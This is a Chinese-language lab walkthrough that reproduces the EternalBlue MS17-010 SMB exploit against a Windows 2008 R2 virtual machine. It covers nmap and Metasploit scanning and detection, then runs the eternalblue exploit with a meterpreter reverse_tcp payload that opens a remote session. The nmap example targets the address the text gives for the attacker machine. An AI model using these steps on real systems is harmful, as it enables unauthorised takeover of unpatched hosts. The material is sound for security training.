天天看點

永恒之藍 MS17-010漏洞複現

目錄導航

  • 一. 複現環境
  • 二. 漏洞原理
    • 1.漏洞簡介
    • 2.漏洞原理代碼詳解
  • 三. 漏洞複現
    • 1.資訊收集
    • 2.漏洞探測
    • 3.漏洞利用

一. 複現環境

工具:msf

攻擊機:Kali linux 虛拟機一台 ip: 169.254.93.24

測試機:Windows 2008 r2 虛拟機一台 ip: 169.254.93.243

網絡環境:手機WiFi網絡USB共享,同一區域網路,橋接網絡模式

二. 漏洞原理

1.漏洞簡介

永恒之藍是指2017年4月14日晚,黑客團體Shadow Brokers(影子經紀人)公布一大批網絡攻擊工具,其中包含“永恒之藍”工具,“永恒之藍”利用Windows系統的SMB漏洞可以擷取系統最高權限。5月12日,不法分子通過改造“永恒之藍”制作了wannacry勒索病毒,英國、俄羅斯、整個歐洲以及中國國内多個高校校内網、大型企業内網和政府機構專網中招,被勒索支付高額贖金才能解密恢複檔案

永恒之藍漏洞是方程式組織在其漏洞利用架構中一個針對SMB服務進行攻擊的漏洞,該漏洞導緻攻擊者在目标系統上可以執行任意代碼。

注:SMB服務的作用:該服務在Windows與UNIX系列OS之間搭起一座橋梁,讓兩者的資源可互通有無

2.漏洞原理代碼詳解

想要從代碼詳細了解該漏洞的可以點選檢視:

http://blogs.360.cn/post/nsa-eternalblue-smb.html#toc-772

https://blog.csdn.net/qq_27446553/article/details/73480807

三. 漏洞複現

1.資訊收集

- 确認網絡情況

永恒之藍 MS17-010漏洞複現

- 探測敏感端口

1. 使用nmap掃描(推薦)

nmap -p 445 -sV -Pn 169.254.93.24
           
永恒之藍 MS17-010漏洞複現

可以看到這裡掃描的結果顯示目标主機開啟了445端口;而永恒之藍利用的就是445端口的smb服務也就是作業系統溢出漏洞

2.使用msf syn掃描子產品

使用msf的掃描子產品,通過search scanner可以檢視大量的掃描子產品,這裡通過search portscan指令檢視端口掃描器清單,輸入use 子產品名,即可使用該子產品

msf5 exploit(windows/smb/ms17_010_eternalblue) > search scanner
           
永恒之藍 MS17-010漏洞複現
msf5 exploit(windows/smb/ms17_010_eternalblue) > search portscan
msf5 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) > show options 
           
永恒之藍 MS17-010漏洞複現
這裡說明一下參數的意義:
set rhosts 這個選項是設定要掃描的目标主機ip  如果設定本機則是lhosts
set ports  這個選項是設定要掃描目标主機的端口範圍
set threads 這個選項是設定掃描是的線程 一般50足夠了
show options 檢視我們設定的參數情況
           
永恒之藍 MS17-010漏洞複現

可以看到這裡掃描的結果顯示目标記器0-500的端口内開了80,135,445端口;而永恒之藍利用的就是445端口中的smb服務作為攻擊載體

永恒之藍 MS17-010漏洞複現

2.漏洞探測

1.nmap腳本探測

可使用

--script=smb-vuln-ms17-010

永恒之藍漏洞探測腳本進行掃描,如下:

永恒之藍 MS17-010漏洞複現

2.msf探測

指令行輸入 search ms17-010 檢視關于永恒之藍的漏洞子產品

永恒之藍 MS17-010漏洞複現

可以看到有auxiliary(輔助)子產品和exploit(攻擊)子產品,而我們現在要使用的是子產品二,用來進行對永恒之藍的漏洞探測

msf5 auxiliary(scanner/portscan/syn) > use auxiliary/scanner/smb/smb_ms17_010
           
永恒之藍 MS17-010漏洞複現

掃描結果顯示該主機很容易受到ms17-010的攻擊

3.漏洞利用

使用攻擊子產品:use exploit/windows/smb/ms17_010_eternalblue 進行攻擊

選擇攻擊子產品時要根據不同版本的作業系統來選擇合适的攻擊子產品

set payload :設定payload,這裡用set payload windows/x64/meterpreter/reverse_tcp
要選用其他payload可以使用show payloads檢視适合要攻擊的目标主機的payload
show options :使用該指令會列出使用目前子產品所需呀配置的參數
set rhosts 目标主機位址 :該指令會設定好要攻擊的目标主機位址
set lhosts 攻擊機位址 :該指令設定攻擊機的位址,使目标主機回連至攻擊機
set lport 回連的端口 :該指令設定目标主機回連至攻擊機的端口,預設為4444
           
永恒之藍 MS17-010漏洞複現

所有條件設定好後 輸入run:開始攻擊

攻擊成功後攻擊機和目标主機之間會建立一個連接配接,得到一個meterpreter會話

永恒之藍 MS17-010漏洞複現

到這裡漏洞攻擊已經成功,接下來要做的就是後滲透攻擊,涉及到跳闆攻擊、域内權限提升,密碼哈希值擷取,擷取shell以及其他更多資訊

繼續閱讀